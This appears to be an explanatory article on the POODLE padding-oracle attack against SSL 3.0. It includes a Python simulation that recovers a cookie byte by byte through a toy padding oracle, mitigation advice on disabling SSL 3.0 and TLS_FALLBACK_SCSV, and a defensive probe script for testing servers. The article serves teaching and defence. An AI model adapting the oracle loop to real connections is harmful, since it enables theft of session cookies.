Another month has passed and another SSL vulnerability has been found, this time in SSL 3.0. Google’s security team revealed on Tuesday that the long obsolete, but still far too widely used, Secure Sockets Layer (SSL) 3.0 cryptographic protocol has a major security flaw. SSL 3.0 is an obsolete and insecure protocol that today is needed mostly by Internet Explorer 6.0 (around 3% of Internet traffic). For most practical purposes it has been replaced by TLS 1.0, TLS 1.1 and TLS 1.2, but many TLS implementations remain backwards compatible with SSL 3.0 in order to interoperate with legacy systems in the interest of a smoother user experience.
The TLS handshake provides authenticated version negotiation: the client offers the highest version it supports, the server picks the highest version the two have in common, and because the Finished messages cover the whole handshake transcript, an attacker cannot silently tamper with that choice. All subsequent traffic then uses the negotiated version.
Even when the client and server both support a version of TLS (the newer protocol), the security level offered by SSL 3.0 still matters, because many clients implement a protocol downgrade “feature” to work around interoperability bugs in some server implementations: if the TLS handshake fails, the browser simply retries with an older protocol version, all the way down to SSL 3.0. That retry happens outside the authenticated negotiation, so an active attacker who drops the TLS handshake attempts can push a browser and a server that both speak TLS 1.2 down to SSL 3.0.
The POODLE attack (Padding Oracle On Downgraded Legacy Encryption) allows a network attacker to steal “secure” HTTP cookies (or other tokens such as the contents of an HTTP Authorization header) one byte at a time.
[h2]How does POODLE work?[/h2]
POODLE is a padding oracle attack on the cipher block chaining (CBC) cipher suites of SSL 3.0, run in the same attacker setting as BEAST, which made the news a while back: the attacker sits in the middle of the connection and can also make the victim’s browser issue many HTTPS requests of chosen lengths, for example with JavaScript served from an attacker-controlled page. The weakness is that SSL 3.0 CBC padding is not covered by the MAC and only its final length byte is checked. The attacker lines the request up so that a secret byte (a cookie byte) sits at the end of a ciphertext block and the final block consists of nothing but padding, then replaces that final block with the block containing the secret. The server decrypts the swapped-in block and accepts the record only when its decrypted last byte happens to equal the expected padding length, which occurs with probability 1/256; an accept leaks the secret byte through an XOR with two known ciphertext bytes. On average 256 requests therefore recover one byte, and a 16-byte cookie falls in about 4,000 requests.
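To make the mechanics concrete, here is a self-contained simulation, an added example written for this page and not code from Google’s advisory. It implements SSL 3.0-style MAC-then-pad CBC records with the real padding check, and an attacker that recovers a cookie byte by byte through that check. Everything it assumes is a stand-in: a small Feistel block cipher keyed with HMAC-SHA256 instead of 3DES/AES, HMAC-SHA256 instead of the SSL 3.0 MAC, a fresh random IV per record instead of the chained IV, and a constructed secret, request layout and key material. None of those substitutions changes the padding check that POODLE exploits.

```python
import hashlib
import hmac
import os

BLOCK = 8       # block size in bytes (3DES under SSL 3.0 also uses 8)
MACLEN = 32     # HMAC-SHA256 stands in for the SSL 3.0 MAC (simplification)
SECRET = b"s3cr3t"  # constructed sample cookie value the attacker wants to read


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, rnd, half):
    # Feistel round function: HMAC-SHA256 truncated to half a block
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:BLOCK // 2]

def block_encrypt(key, block):
    """4-round Feistel network: a tiny but invertible block cipher (stand-in for 3DES/AES)."""
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, rnd, r))
    return l + r

def block_decrypt(key, block):
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, rnd, l)), l
    return l + r

def cbc_encrypt(key, iv, pt):
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

def ssl3_pad(data):
    """SSL 3.0 padding: arbitrary bytes plus one length byte, up to a block multiple.
    When data already ends on a block boundary, a whole block of padding is added."""
    padlen = (BLOCK - (len(data) + 1) % BLOCK) % BLOCK
    return data + os.urandom(padlen) + bytes([padlen])

def client_send(enc_key, mac_key, plaintext):
    """Browser side: MAC, pad, CBC-encrypt. Returns IV || ciphertext."""
    mac = hmac.new(mac_key, plaintext, hashlib.sha256).digest()
    iv = os.urandom(BLOCK)  # random per-record IV (simplification of SSL 3.0 chaining)
    return iv + cbc_encrypt(enc_key, iv, ssl3_pad(plaintext + mac))

def server_accepts(enc_key, mac_key, record):
    """Server side, the padding oracle: SSL 3.0 checks only the final length byte,
    never the padding bytes themselves, then verifies the MAC over what is left."""
    pt = cbc_decrypt(enc_key, record[:BLOCK], record[BLOCK:])
    padlen = pt[-1]
    if padlen >= BLOCK:
        return False
    body = pt[:len(pt) - padlen - 1]
    if len(body) < MACLEN:
        return False
    expected = hmac.new(mac_key, body[:-MACLEN], hashlib.sha256).digest()
    return hmac.compare_digest(body[-MACLEN:], expected)

HEAD, TAIL = b"GET /", b" HTTP/1.1\r\nCookie: sid="  # constructed request layout

def build_request(prefix_len, suffix_len):
    """The victim browser's request: attacker JavaScript picks the path and body
    lengths, the browser appends the cookie by itself."""
    return HEAD + b"A" * prefix_len + TAIL + SECRET + b"\r\n\r\n" + b"B" * suffix_len

def recover_byte(enc_key, mac_key, k, max_attempts=20000):
    """Recover SECRET[k] through the oracle. Returns (byte value, requests used)."""
    # Path length: put SECRET[k] at the last position of some plaintext block ...
    prefix_len = (BLOCK - 1 - (len(HEAD) + len(TAIL) + k)) % BLOCK
    target = (len(HEAD) + prefix_len + len(TAIL) + k) // BLOCK  # that block's index
    # ... body length: make data+MAC a block multiple so the last block is pure padding.
    suffix_len = -(len(build_request(prefix_len, 0)) + MACLEN) % BLOCK
    for attempt in range(1, max_attempts + 1):
        rec = client_send(enc_key, mac_key, build_request(prefix_len, suffix_len))
        iv, ct = rec[:BLOCK], rec[BLOCK:]
        blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
        # MITM step: replace the all-padding last block with C_target.
        tampered = iv + ct[:-BLOCK] + blocks[target + 1]
        if server_accepts(enc_key, mac_key, tampered):
            # Accepted => D(C_target)[-1] ^ C[n-2][-1] == BLOCK-1, and the real
            # plaintext byte is D(C_target)[-1] ^ C[target-1][-1] (IV if target == 0).
            return (BLOCK - 1) ^ blocks[-2][-1] ^ blocks[target][-1], attempt
    raise RuntimeError("oracle never accepted; raise max_attempts")

def recover_secret(enc_key, mac_key):
    """Recover the whole cookie; returns (bytes, total requests used)."""
    out, total = bytearray(), 0
    for k in range(len(SECRET)):
        value, used = recover_byte(enc_key, mac_key, k)
        out.append(value)
        total += used
    return bytes(out), total

if __name__ == "__main__":
    ek, mk = os.urandom(16), os.urandom(16)
    print(recover_secret(ek, mk))  # about 256 requests per recovered byte
```

Every accepted tampered record is a certain hit, since the padding check passes only when the decrypted last byte equals the expected pad length, so there are no false positives; the cost is the roughly 256 requests per byte that the attacker’s JavaScript issues in the background. The same loop works against any server that still negotiates SSL 3.0 CBC suites, whatever the block cipher.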
The POODLE attack requires that an SSL 3.0 connection be established between the two endpoints, so disabling SSL 3.0 on either side, on every web server or on the client (typically a web browser), prevents the attack. However, if SSL 3.0 is the only “encryption” protocol the two have in common, then, as Möller said in Google’s announcement, “all hope is gone, and a serious update required to avoid insecure encryption.”
[h2]How to get around this[/h2]
To get around this vulnerability you should disable support for SSL 3.0 on all your web servers, or at the very least turn off the cipher block chaining (CBC) cipher suites for SSL 3.0. Bear in mind that the only non-CBC cipher SSL 3.0 offers is RC4, which has well-documented keystream biases of its own, so disabling the protocol is the only real fix. Either step will break compatibility with old browsers and servers that cannot speak TLS. That is a decision you will have to make: the security of your business, or the few visitors still on clients that only speak SSL 3.0.
Google’s suggestion is “to support TLS_FALLBACK_SCSV on your Web or SSH servers. This prevents the server from allowing failed connection retries. This, in turn, prevents browsers from defaulting to SSL 3 when they’re unable to connect with an up-to-date protocol.” TLS_FALLBACK_SCSV (later standardised as RFC 7507) is a signalling cipher suite value that a TLS client includes in its ClientHello whenever it retries a handshake with a lower protocol version than it actually supports; a server that supports a higher version than the one offered then aborts the handshake with an inappropriate_fallback alert instead of completing it, so an attacker who blocks the TLS handshakes can no longer push the connection down to SSL 3.0. It only helps when both browser and server implement it, which is why disabling SSL 3.0 remains the primary fix.
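As an added example, not from the article, here is a small Python probe for checking a server after the change. It sends a raw SSL 3.0 ClientHello (which a fixed server must refuse) and a TLS 1.0 ClientHello that carries TLS_FALLBACK_SCSV (which a server implementing the check must answer with alert 86, inappropriate_fallback, when it supports a newer version) and reports the first record the server sends back. The record and handshake layouts follow RFC 6101 and RFC 5246; the host and port are whatever you point it at, and the legacy cipher suite list is an assumed set of common SSL 3.0-era suites.

```python
import os
import socket
import struct

SSL3, TLS10 = 0x0300, 0x0301
TLS_FALLBACK_SCSV = 0x5600
# Assumed list of legacy suites: 3DES-SHA, AES128-SHA, AES256-SHA, RC4-SHA, RC4-MD5.
LEGACY_SUITES = [0x000A, 0x002F, 0x0035, 0x0005, 0x0004]
ALERT_NAMES = {40: "handshake_failure", 70: "protocol_version", 86: "inappropriate_fallback"}


def build_client_hello(version, suites):
    """Minimal ClientHello with no extensions, so it is valid for SSL 3.0 as well as TLS."""
    body = struct.pack("!H", version) + os.urandom(32) + b"\x00"  # version, random, empty session id
    body += struct.pack("!H", 2 * len(suites)) + b"".join(struct.pack("!H", s) for s in suites)
    body += b"\x01\x00"  # one compression method: null
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body  # HandshakeType client_hello
    return b"\x16" + struct.pack("!HH", version, len(handshake)) + handshake  # ContentType handshake


def classify_response(data):
    """Interpret the first record the server sends back."""
    if len(data) < 5:
        return "no response (connection closed or timed out)"
    ctype = data[0]
    if ctype == 0x16 and len(data) >= 11 and data[5] == 0x02:  # handshake / ServerHello
        version = struct.unpack("!H", data[9:11])[0]
        return "ServerHello: version 0x%04x accepted" % version
    if ctype == 0x15 and len(data) >= 7:  # alert: level at byte 5, description at byte 6
        desc = data[6]
        return "alert %d (%s)" % (desc, ALERT_NAMES.get(desc, "other"))
    return "unexpected record type 0x%02x" % ctype


def probe(host, port, version, suites, timeout=5.0):
    """Send one ClientHello and classify the server's first record."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_client_hello(version, suites))
        try:
            data = s.recv(4096)
        except OSError:  # timeout or reset: both count as a refusal
            data = b""
    return classify_response(data)


def check_server(host, port=443):
    """Probe 1: bare SSL 3.0 hello, must not yield a ServerHello after the fix.
    Probe 2: TLS 1.0 hello with TLS_FALLBACK_SCSV; alert 86 shows the server enforces it."""
    return {
        "sslv3": probe(host, port, SSL3, LEGACY_SUITES),
        "fallback_scsv": probe(host, port, TLS10, LEGACY_SUITES + [TLS_FALLBACK_SCSV]),
    }


if __name__ == "__main__":
    import sys
    for name, result in check_server(sys.argv[1]).items():
        print(name, "->", result)
```

Read the results with care: a ServerHello on the first probe means SSL 3.0 is still enabled; an alert 70 (protocol_version) on the second probe means the server refused TLS 1.0 altogether, which also blocks the downgrade but says nothing about whether the SCSV check is implemented, so repeat that probe with the highest version the server still accepts below its maximum.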